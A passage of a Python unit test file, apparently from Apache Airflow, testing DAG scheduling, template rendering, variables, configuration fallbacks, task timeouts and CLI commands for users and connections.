dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
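# Derive the sleep duration from our PID so the spawned 'sleep' process can be
# identified unambiguously by its command line below.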
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEquals(context['ds'], '2015-01-01')
self.assertEquals(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEquals(context['next_ds'], '2015-01-02')
self.assertEquals(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEquals(context['prev_ds'], '2014-12-31')
self.assertEquals(context['prev_ds_nodash'], '20141231')
self.assertEquals(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEquals(context['ts_nodash'], '20150101T000000+0000')
self.assertEquals(context['yesterday_ds'], '2014-12-31')
self.assertEquals(context['yesterday_ds_nodash'], '20141231')
self.assertEquals(context['tomorrow_ds'], '2015-01-02')
self.assertEquals(context['tomorrow_ds_nodash'], '20150102')
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# Check that the failed task's recorded duration reflects the ~3 second timeout
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
self.assertEquals(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEquals(dag_run.execution_date, utc_now)
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
from airflow.www_rbac import app as application
configuration.load_test_config()
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test1', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@foo.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test2', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@apache.org', '-r', 'Viewer', '-p', 'test'
])
cli.create_user(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'create_user', '-u', 'test3', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@example.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
args = self.parser.parse_args([
'delete_user', '-u', 'test3',
])
cli.delete_user(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'create_user', '-u', 'user{}'.format(i), '-l', 'doe', '-f', 'jon',
'-e', 'jdoe+{}@gmail.com'.format(i), '-r', 'Viewer',
'--use_random_password'
])
cli.create_user(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.list_users(self.parser.parse_args(['list_users']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_sync_perm(self):
# test whether sync_perm cli will throw exceptions or not
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
